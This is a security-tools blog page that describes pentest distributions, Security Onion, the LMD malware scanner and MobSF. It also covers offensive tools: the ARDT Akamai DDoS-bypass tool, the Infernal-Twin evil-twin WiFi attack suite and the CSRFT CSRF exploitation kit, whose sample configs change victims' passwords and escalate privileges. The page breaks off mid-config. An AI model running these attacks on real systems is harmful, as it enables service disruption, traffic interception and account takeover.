SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

  • Penetration Testing Distribution - BackBox

    BackBox is an Ubuntu-based Linux distribution oriented towards penetration testing and security assessment, providing a network and information systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze. For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created specifically for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Tuesday, January 5, 2016

Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management




Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!


  • Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes
  • Analyze your NIDS/HIDS alerts with Squert
  • Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner
  • Use ELSA to slice and dice your logs
  • Access full packet capture with CapMe
  • Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic
  • Easy updates

Data Types

  • Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
  • Asset data from Prads and Bro
  • Full content data from netsniff-ng
  • Host data via OSSEC and syslog-ng
  • Session data from Argus, Prads, and Bro
  • Transaction data - http/ftp/dns/ssl/other logs from Bro


ARDT - Akamai Reflective DDoS Tool




Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Akamai boasts around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching, etc., to ensure that a minimal number of requests actually hit the origin web server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, will result in a cache miss, and the Akamai edge node will then request the resource from the origin server itself.

Provided a list of Akamai edge nodes and a valid cache-missing request, the tool produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, each sending requests at around 20 per second, with a 100,000-entry Akamai edge node list, and a request that results in 10KB hitting the origin, then, if my calculations are correct, that's around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.
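From the defender's side, the cache-miss mechanism described above leaves a measurable trace at the origin: a burst of requests for URLs the cache has never served before, arriving through many edge addresses. The detector below is an added example, not part of ARDT or of any Akamai tooling. It assumes a constructed log line format in which the CDN's cache status (HIT/MISS) is forwarded to the origin's access log; the addresses, timestamps and threshold are constructed for the demonstration.

```python
"""Origin-side detector for bursts of first-seen cache-miss requests.

Assumed (constructed) log format, one request per line:
    <unix_ts> <edge_ip> <cache_status> <method> <url>
The cache_status field stands in for whatever header the CDN forwards;
its name and the sample addresses are assumptions for this example."""
from collections import defaultdict
from typing import List, NamedTuple, Tuple


class Request(NamedTuple):
    ts: int
    edge_ip: str
    status: str
    method: str
    url: str


def parse_line(line: str) -> Request:
    ts, edge_ip, status, method, url = line.split(maxsplit=4)
    return Request(int(ts), edge_ip, status, method, url)


def detect_miss_flood(lines: List[str], window: int = 60,
                      threshold: int = 20) -> List[Tuple[int, int, int]]:
    """Return (window_start, first_seen_misses, distinct_edge_ips) for each
    time window in which the number of never-before-seen URLs that missed
    the cache reaches `threshold`.

    Repeated misses of the same URL are ignored: that is what an ordinary
    cold cache looks like. The pattern worth alerting on is many distinct,
    uncacheable URLs in a short time, which is exactly what a search-style
    cache-miss flood produces."""
    seen_urls = set()
    windows = defaultdict(lambda: {"misses": 0, "edges": set()})
    for line in lines:
        rec = parse_line(line)
        if rec.status != "MISS" or rec.url in seen_urls:
            continue
        seen_urls.add(rec.url)
        bucket = rec.ts - rec.ts % window          # align to the window start
        windows[bucket]["misses"] += 1
        windows[bucket]["edges"].add(rec.edge_ip)
    return [(start, stats["misses"], len(stats["edges"]))
            for start, stats in sorted(windows.items())
            if stats["misses"] >= threshold]


# Constructed sample log: a quiet minute with one ordinary cache miss, then
# 30 distinct search URLs within ten seconds via five edge addresses.
BENIGN_LINES = [f"1704067000 203.0.113.{i + 1} HIT GET /index.html" for i in range(5)]
BENIGN_LINES.append("1704067001 203.0.113.1 MISS GET /search?q=printers")
FLOOD_LINES = [f"{1704067200 + i % 10} 203.0.113.{i % 5 + 1} MISS GET /search?q=rnd{i}"
               for i in range(30)]
SAMPLE_LOG = BENIGN_LINES + FLOOD_LINES

if __name__ == "__main__":
    for start, misses, edges in detect_miss_flood(SAMPLE_LOG):
        print(f"window {start}: {misses} first-seen cache misses via {edges} edge IPs")
```

The threshold should be set from a baseline of the site's normal first-seen miss rate; the point of the check is that ordinary users repeat popular queries, while the flood described above never does. The same counter is a natural input for a rate limit on the uncacheable endpoints themselves.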

Finding Akamai Edge Nodes

To find Akamai edge nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more; it then saves the IPs automatically.



Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)



This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be a few issues with database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow these steps:
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql> use mysql;
    mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql> GRANT ALL PRIVILEGES ON *.* TO 'root2'@'localhost' WITH GRANT OPTION;

  3. Try to run the tool again.

Release Notes:

New Features:
  • GUI Wireless security assessment Suite
  • Implemented
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request

Changes:
  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Bug Fixes:
  • Wireless Evil Access Point traffic redirect
  • Fixed WPA2 Cracking
  • Fixed Infernal Wireless
  • Fixed Free AP
  • Check for requirements
  • DB implementation via config file
  • Improved Catch and error
  • Check for requirements
  • Works with Kali 2

Coming Soon:
  • Parsing t-shark log files for gathering creds and more
  • More attacks.

Expected bugs:
  • Wireless card might not be supported
  • Window might crash
  • Freeze
  • A lot of work to be done, but this tool is still being developed.



LMD - Linux Malware Detect


Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches; they are also easily exported to any number of detection tools such as ClamAV.

The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remain abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931

Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there were 6,931, or 78%, that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58%, with low and high detection rates of 10% and 100% respectively. There could not be a clearer statement of the need for an open and community-driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:
  • MD5 file hash detection for quick threat identification
  • HEX based pattern matching for identifying threat variants
  • statistical analysis component for detection of obfuscated threats (e.g: base64)
  • integrated detection of ClamAV to use as scanner engine for improved performance
  • integrated signature update feature with -u|--update
  • integrated version update feature with -d|--update-ver
  • scan-recent option to scan only files that have been added/changed in X days
  • scan-all option for full path based scanning
  • checkout option to upload suspected malware to rfxn.com for review / hashing
  • full reporting system to view current and previous scan results
  • quarantine queue that stores threats in a safe fashion with no permissions
  • quarantine batching option to quarantine the results of a current or past scans
  • quarantine restore option to restore files to original path, owner and perms
  • quarantine suspend account option to Cpanel suspend or shell revoke users
  • cleaner rules to attempt removal of malware injected strings
  • cleaner batching option to attempt cleaning of previous scan reports
  • cleaner rules to remove base64 and gzinflate(base64) injected malware
  • daily cron based scanning of all changes in last 24h in user homedirs
  • daily cron script compatible with stock RH style systems, Cpanel & Ensim
  • kernel based inotify real time file scanning of created/modified/moved files
  • kernel inotify monitor that can take path data from STDIN or FILE
  • kernel inotify monitor convenience feature to monitor system users
  • kernel inotify monitor can be restricted to a configurable user html root
  • kernel inotify monitor with dynamic sysctl limits for optimal performance
  • kernel inotify alerting through daily and/or optional weekly reports
  • e-mail alert reporting after every scan execution (manual & daily)
  • path, extension and signature based ignore options
  • background scanner option for unattended scan operations
  • verbose logging & output of all actions
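To make the signature model above concrete (MD5 hash signatures, HEX pattern signatures, a statistical heuristic for base64-obfuscated payloads, and export of the hash set to ClamAV), here is a minimal scanner over an in-memory set of files. It is an added example and not LMD's code: the signature names, the "known bad" sample and the file contents are constructed, and the base64 heuristic is a deliberate simplification of LMD's statistical component.

```python
"""Toy LMD-style scanner: MD5 hash signatures, HEX pattern signatures and a
base64 heuristic over an in-memory path->bytes mapping.
Signature names and sample files are constructed for this example."""
import base64
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed "known bad" file; its MD5 plays the role of an LMD hash signature.
KNOWN_BAD_SAMPLE = b"#!/bin/sh\n# constructed known-bad sample, not real malware\n"

# MD5 signatures: digest -> (signature name, file size). Names are hypothetical.
MD5_SIGNATURES: Dict[str, Tuple[str, int]] = {
    hashlib.md5(KNOWN_BAD_SAMPLE).hexdigest(): ("bin.example.knownbad", len(KNOWN_BAD_SAMPLE)),
}

# HEX signatures are raw byte patterns; this one is the hex encoding of "<?php @eval(".
HEX_SIGNATURES: Dict[str, bytes] = {
    "php.cmdshell.example": bytes.fromhex("3c3f70687020406576616c28"),  # hypothetical name
}

# Heuristic for obfuscated injections: a long base64 run passed to base64_decode().
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def looks_base64_injected(data: bytes) -> bool:
    return b"base64_decode" in data and BASE64_RUN.search(data) is not None


def scan_file(data: bytes) -> List[Tuple[str, str]]:
    """Return (detection_kind, signature_name) pairs for one file's bytes."""
    hits: List[Tuple[str, str]] = []
    digest = hashlib.md5(data).hexdigest()
    if digest in MD5_SIGNATURES:
        hits.append(("md5", MD5_SIGNATURES[digest][0]))
    for name, pattern in HEX_SIGNATURES.items():
        if pattern in data:
            hits.append(("hex", name))
    if looks_base64_injected(data):
        hits.append(("heuristic", "base64.inject.suspect"))  # hypothetical name
    return hits


def scan_files(files: Dict[str, bytes]) -> Dict[str, List[Tuple[str, str]]]:
    """Scan a path->bytes mapping; only files with at least one hit are reported."""
    report: Dict[str, List[Tuple[str, str]]] = {}
    for path, data in files.items():
        hits = scan_file(data)
        if hits:
            report[path] = hits
    return report


def export_clamav_hdb() -> List[str]:
    """MD5 signatures in ClamAV's .hdb line layout: md5:filesize:MalwareName."""
    return [f"{digest}:{size}:{name}" for digest, (name, size) in MD5_SIGNATURES.items()]


# Constructed sample files: one clean, one matching the HEX signature, one
# base64-obfuscated eval() injection, and the known-bad sample itself.
SAMPLE_FILES: Dict[str, bytes] = {
    "/home/user1/public_html/index.php": b"<?php echo 'hello'; ?>\n",
    "/home/user1/public_html/.cache.php": b"<?php @eval($_POST['c']); ?>\n",
    "/home/user2/public_html/x.php": (b"<?php eval(base64_decode('"
                                      + base64.b64encode(b"x" * 200) + b"')); ?>\n"),
    "/tmp/known.bin": KNOWN_BAD_SAMPLE,
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, hits)
    print("\n".join(export_clamav_hdb()))
```

The three detection layers are deliberately ordered from cheapest to most heuristic: a hash match is exact but breaks on any byte change, a HEX pattern survives variants that keep the same code fragment, and the base64 heuristic catches payloads that hide the fragment entirely, at the cost of false positives on legitimately embedded blobs, which is why LMD pairs it with an ignore list.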


Source Data:
The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:
Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:
LMD signatures are updated typically once per day or more frequently, depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the --update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914 HEX) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:
base64.inject.unclassed      perl.ircbot.xscan
bin.dccserv.irsexxy          perl.mailer.yellsoft
bin.fakeproc.Xnuxer          perl.shell.cbLorD
bin.ircbot.nbot              perl.shell.cgitelnet
bin.ircbot.php3              php.cmdshell.c100
bin.ircbot.unclassed         php.cmdshell.c99
bin.pktflood.ABC123          php.cmdshell.cih
bin.pktflood.osf             php.cmdshell.egyspider
bin.trojan.linuxsmalli       php.cmdshell.fx29
c.ircbot.tsunami             php.cmdshell.ItsmYarD
exp.linux.rstb               php.cmdshell.Ketemu
exp.linux.unclassed          php.cmdshell.N3tshell
exp.setuid0.unclassed        php.cmdshell.r57
gzbase64.inject              php.cmdshell.unclassed
html.phishing.auc61          php.defash.buno
html.phishing.hsbc           php.exe.globals
perl.connback.DataCha0s      php.include.remote
perl.connback.N2             php.ircbot.InsideTeam
perl.cpanel.cpwrap           php.ircbot.lolwut
perl.ircbot.atrixteam        php.ircbot.sniper
perl.ircbot.bRuNo            php.ircbot.vj_denie
perl.ircbot.Clx              php.mailer.10hack
perl.ircbot.devil            php.mailer.bombam
perl.ircbot.fx29             php.mailer.PostMan
perl.ircbot.magnum           php.phishing.AliKay
perl.ircbot.oldwolf          php.phishing.mrbrain
perl.ircbot.putr4XtReme      php.phishing.ReZulT
perl.ircbot.rafflesia        php.pktflood.oey
perl.ircbot.UberCracker      php.shell.rc99
perl.ircbot.xdh              php.shell.shellcomm


Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with:

There are three modes that the monitor can be executed with, and they relate to what will be monitored: USERS|PATHS|FILES.
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option takes the home directories of all system users whose UID is above inotify_minuid and monitors them. If inotify_webdir is set, then only the user's webdir, if it exists, will be monitored.
PATHS: A comma-separated list of paths to monitor
FILE: A file containing one path to monitor per line

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.



XPL-SEARCH - Search Exploits In Multiple Exploit Databases




XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE

TO RUN THE SCRIPT
  • PHP (cli) version 5.5.8 or higher (php5-cli lib)
  • cURL support enabled (php5-curl lib)
  • cURL version 7.40.0 or higher
  • allow_url_fopen On
  • Read and write permissions

ABOUT DEVELOPER
  • Author nick: CoderPIRATA
  • Author name: Eduardo
  • Email: coderpirata@gmail.com
  • Blog: http://coderpirata.blogspot.com.br/
  • Twitter: https://twitter.com/coderpirata
  • Google+: https://plus.google.com/103146866540699363823
  • Pastebin: http://pastebin.com/u/CoderPirata
  • Github: https://github.com/coderpirata/

"CHANGELOG"
0.1 - [02/07/2015]
- Started.

0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.

0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.

0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.

0.5 - [29/08/2015]
- Added search by Author.

0.6 - [09/09/2015]
- Now displays the author of the exploit.
* Does not work with IntelligentExploit.
- Changes in search logs.

0.7 - [11/09/2015]
- Added search in CVE.
* ID.
* Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.

0.7.1 - [17/09/2015]
- Bug in milw00rm solved

0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Other minor bugs solved.

Screenshot


MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework




Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-testing, and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like SSL overriding, SSL bypass, weak crypto, obfuscated code, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack traces, and on the application assets like settings files, preferences, and databases. This framework is highly scalable, so that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, Windows Phone etc. in the future.
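One of the manifest checks such a static analyzer performs (the v0.8.6 changelog below lists detection of implicitly exported components) fits in a few lines. The following is an added example, not MobSF's code; the manifest is constructed, and the rule applied is Android's default: an activity, service or receiver that declares an <intent-filter> without an android:exported attribute is exported, and a <provider> without the attribute is exported by default when the app targets an SDK version below 17.

```python
"""Report Android manifest components that are exported only implicitly.
The sample manifest is constructed for this example."""
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def _android_attr(elem: ET.Element, name: str) -> Optional[str]:
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def _is_launcher(component: ET.Element) -> bool:
    """The MAIN/LAUNCHER activity has to be exported; skip it to avoid noise."""
    for filt in component.findall("intent-filter"):
        for cat in filt.findall("category"):
            if _android_attr(cat, "name") == "android.intent.category.LAUNCHER":
                return True
    return False


def find_implicitly_exported(manifest_xml: str) -> List[Tuple[str, str, str]]:
    """Return (component_tag, component_name, reason) for every component whose
    exported state is not declared and whose default makes it reachable."""
    findings: List[Tuple[str, str, str]] = []
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return findings
    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        name = _android_attr(comp, "name") or "?"
        if _android_attr(comp, "exported") is not None:
            continue  # declared explicitly; whatever the value, it is not implicit
        if comp.tag == "provider":
            findings.append((comp.tag, name,
                             "no android:exported; exported by default below targetSdkVersion 17"))
        elif comp.find("intent-filter") is not None and not _is_launcher(comp):
            findings.append((comp.tag, name,
                             "has an <intent-filter> but no android:exported; exported by default"))
    return findings


# Constructed manifest covering the cases: launcher (skipped), deep-link activity
# (implicit), internal activity (no filter), explicitly non-exported service,
# boot receiver (implicit) and a provider without the attribute.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application android:label="Example">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="example"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity"/>
    <service android:name=".SyncService" android:exported="false">
      <intent-filter><action android:name="com.example.app.SYNC"/></intent-filter>
    </service>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <provider android:name=".DataProvider" android:authorities="com.example.app.data"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for tag, name, reason in find_implicitly_exported(SAMPLE_MANIFEST):
        print(f"{tag} {name}: {reason}")
```

A finding here is a review item rather than a vulnerability by itself: the fix is to declare android:exported explicitly on every component so the intent is visible in the manifest, which Android 12 (targetSdkVersion 31) in any case requires for components that carry an intent filter.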

Documentation

Queries

Screenshots and Sample Report

Static Analysis - Android APK

Static Analysis - iOS IPA

Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
  • New name: Mobile Security Framework (MobSF)
  • Added Dynamic Analysis
  • VM Available for Download
  • Fixed RCE
  • Fixed Broken Manifest File Parsing Logic
  • Sqlite DB Support
  • Fixed Reporting with new PDF report
  • Rescan Option
  • Detect Root Detection
  • Added requirements.txt
  • Automated Java Path Detection
  • Improved Manifest and Code Analysis
  • Fixed Unzipping error for Unix.
  • Activity Tester Module
  • Exported Activity Tester Module
  • Device API Hooker with DroidMon
  • SSL Certificate Pinning Bypass with JustTrustMe
  • RootCloak to prevent root Detection
  • Data Pusher to Dump Application Data
  • pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog
  • Improved Static Analysis Rules
  • Better AndroidManifest View
  • Search in Files

v0.8.6 Changelog
  • Detects implicitly exported component from manifest.
  • Added CFR decompiler support
  • Fixed Regex DoS on URL Regex

v0.8.5 Changelog
  • Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog
  • Improved Android Static Code Analysis speed (2X performance)
  • Static Code analysis on Dexguard protected APK.
  • Fixed a Security Issue - Email Regex DoS.
  • Added Logging Code.
  • All Browser Support.
  • MIME Type Bug fix to Support IE.
  • Fixed Progress Bar.

v0.8.3 Changelog
  • View AndroidManifest.xml & Info.plist
  • Supports iOS Binary (IPA)
  • Bug Fix for Linux (Ubuntu), missing MIME Type Detection
  • Check for Hardcoded Certificates
  • Added Code to prevent from Directory Traversal

Credits
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Thomas Abraham - For JS Hacks on UI.
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
  • Anant Srivastava (@anantshri) - For Activity Tester Idea



Gping - Ping, But With A Graph




Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:
gping [yourhost]

If you don't give a host then it pings google.

Why?
My apartment's internet is all 4G, and while it's normally pretty fast it can be a bit flaky. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross-platform one that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot(); this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so there's a big mess of a function called process_colors to try and optimize that. Don't ask.



CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit




This project has been developed to exploit CSRF web vulnerabilities and provide you a quick and easy exploitation toolkit. In a few words, this is a simple HTTP server in NodeJS that communicates with the clients (victims) and sends them a payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here. Go into the directory and install all the dependencies:
npm install
Then, launch the server.js :
$ node server.js
Usage will be displayed :
Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular, so your configuration files/malicious forms, etc. don't have to be in those folders. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :
  • conf folder : add your JSON configuration file with your configuration.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : folder containing all your dictionaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of a JSON configuration file that will target www.vulnerable.com. This is a special value because the malicious payload is already in the URL/form.
{
  "audit": {
    "name": "PoC done with Automatic Tool",
    "scenario": [
      {
        "attack": [
          {
            "method": "GET",
            "type_attack": "special_value",
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionary attack
Here is a basic example of a JSON configuration file. For every entry in the dictionary file, one HTTP request will be made.
{
  "audit": {
    "name": "PoC done with Automatic Tool",
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt",
            "method": "GET",
            "type_attack": "dico",
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}


POST Request with special value attack
{
  "audit": {
    "name": "PoC done with Automatic Tool",
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html",
            "method": "POST",
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}

The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be simultaneous or at different times.
For example, you want to sign the user in and THEN you want him to perform some unwanted actions. You can specify this in the JSON file.
Let's take an example with both POST and GET Request :
{
  "audit": {
    "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",
    "scenario": [
      {
        "attack": [
          {
            "method": "POST",
            "type_attack": "dico",
            "file": "passwords.txt",
            "form": "deepsec_form_log_user.html",
            "comment": "attempt to connect the admin with a list of selected passwords"
          }
        ]
      },
      {
        "attack": [
          {
            "method": "GET",
            "type_attack": "special_value",
            "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
            "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
          }
        ]
      },
      {
        "attack": [
          {
            "method": "GET",
            "type_attack": "special_value",
            "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
